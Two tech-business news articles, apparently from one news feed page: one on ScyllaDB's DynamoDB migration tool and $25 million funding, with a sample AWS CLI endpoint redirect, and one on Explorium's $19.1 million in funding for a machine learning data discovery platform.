There are a lot of open source databases out there, and ScyllaDB, a NoSQL variety, is looking to differentiate itself by attracting none other than Amazon users. Today, it announced a DynamoDB migration tool to help Amazon customers move to its product.

It’s a bold move, but Scylla, which has a free open source product along with paid versions, has always had a penchant for going after bigger players. It has had a tool to help move Cassandra users to ScyllaDB for some time.

CEO Dor Laor says DynamoDB customers can now also migrate existing code with little modification. “If you’re using DynamoDB today, you will still be using the same drivers and the same client code. In fact, you don’t need to modify your client code one bit. You just need to redirect access to a different IP address running Scylla,” Laor told TechCrunch.
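As a rough sketch of what that redirection looks like with the stock AWS tooling: the hostname and port here are assumptions (Scylla’s DynamoDB-compatible API, Alternator, commonly listens on port 8000), not details from the interview:

```shell
# Same AWS CLI, same credentials and API calls; only the endpoint changes
aws dynamodb list-tables \
    --endpoint-url "http://scylla.example.com:8000" \
    --region us-east-1
```

The same `--endpoint-url`-style override exists in the official DynamoDB SDKs, which is what makes the "don't modify your client code" claim plausible.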

He says that the reason customers would want to switch to Scylla is because it offers a faster and cheaper experience by utilizing the hardware more efficiently. That means companies can run the same workloads on fewer machines, and do it faster, which ultimately should translate to lower costs.

The company also announced a $25 million Series C extension led by Eight Roads Ventures. Existing investors Bessemer Venture Partners, Magma Venture Partners, Qualcomm Ventures and TLV Partners also participated. Scylla has raised a total of $60 million, according to the company.

The startup has been around for 6 years and customers include Comcast, GE, IBM and Samsung. Laor says that Comcast went from running Cassandra on 400 machines to running the same workloads with Scylla on just 60.

Laor is playing the long game in the database market, and it’s not about taking on Cassandra, DynamoDB or any other individual product. “Our main goal is to be the default NoSQL database where if someone has big data, real-time workloads, they’ll think about us first, and we will become the default.”

Explorium reveals $19.1M in total funding for machine learning data discovery platform

Explorium, a data discovery platform for machine learning models, received a couple of unannounced funding rounds over the last year — a $3.6 million seed round last September and a $15.5 million Series A round in March. Today, it made both of these rounds public.

The seed round was led by Emerge with participation of F2 Capital. The Series A was led by Zeev Ventures with participation from the seed investors. The total raised is $19.1 million.

The company’s founders, who have a data science background, discovered how hard it was to find the right data to build a machine learning model. Like most good startup founders confronted with a problem, they decided to solve it themselves by building a data discovery platform for data scientists.

CEO and co-founder Maor Shlomo says the company wanted to focus on the quality of the data because not much work has been done there. “A lot of work has been invested on the algorithmic part of machine learning, but the algorithms themselves have very much become commodities. The challenge now is really finding the right data to feed into those algorithms,” Shlomo told TechCrunch.

It’s a hard problem to solve, so they built a kind of search engine that can go out and find the best data wherever it happens to live, whether that’s internal data, an open data set, public data or premium databases. The company has partnered with thousands of data sources, according to Shlomo, to help data scientist customers find the best data for their particular model.

“We developed a new type of search engine that’s capable of looking at the customer’s data, connecting and enriching it with literally thousands of data sources, while automatically selecting what are the best pieces of data, and what are the best variables or features, which could actually generate the best performing machine learning model,” he explained.

Shlomo sees a big role for partnerships, whether that involves data sources or consulting firms, who can help push Explorium into more companies.

Explorium has 63 employees spread across offices in Tel Aviv, Kiev and San Francisco. It’s still early days, but Shlomo reports “tens of customers.” As more companies try to bring data science in-house, especially amid a shortage of data scientists, a tool like Explorium could help fill that gap.